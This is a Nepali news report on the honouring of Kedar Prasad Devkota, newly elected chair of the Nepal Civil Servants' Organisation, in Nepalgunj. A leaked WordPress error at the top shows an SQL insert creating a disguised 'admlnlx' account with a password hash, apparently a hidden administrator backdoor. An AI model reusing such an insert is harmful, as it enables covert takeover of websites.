WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BKnmYpxnOMXsl.S9ggfNz1BBLcVorN.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 21:39:07', '', 'admlnlx', 'admlnlx')
नेपालगन्ज,पुस २-
नेपाल निजामति कर्मचारी संगठनका नवनिर्वाचित केन्द्रीय अध्यक्ष केदारप्रसाद देवकोटालाई राष्ट्रिय स्वास्थ्यकर्मी संघ बांकेले सम्मान गरेको छ । केहीदिन अघि सम्पन्न संगठनको केन्द्रीय अधिवेशनबाट देवकोटा अध्यक्षमा निर्वाचित भएका हुन् ।
शनिवार नेपालगन्जमा आयोजित एक कार्यक्रममा अध्यक्ष देवकोटालाई राष्ट्रिय स्वास्थ्यकर्मी संघका केन्द्रीय उपाध्यक्ष रामबहादुर चन्द लगायतले ढाका टोपी, माला लगाएर स्वागत गरे । सोही कार्यक्रममा बोल्दै अध्यक्ष देवकोटाले निर्वाचनमा प्रतिस्पर्धा भए पनि अब सबैलाई एक ढिक्का बनाएर संगठन चलाउने बताए । उनले निजामती कर्मचारीहरुको हकअधिकारका लागी संघर्ष गर्ने बताए ।
सोही कार्यक्रममा बोल्दै नेकपा एमाले बांकेका प्रचार बिभाग प्रमुख किश्मत कुमार कक्षपतिले कर्मचारीहरुको हकअधिकारका लागी देवकोटाको कार्यकालमा महत्वपूर्ण काम हुने भन्दै शुभकामना दिए ।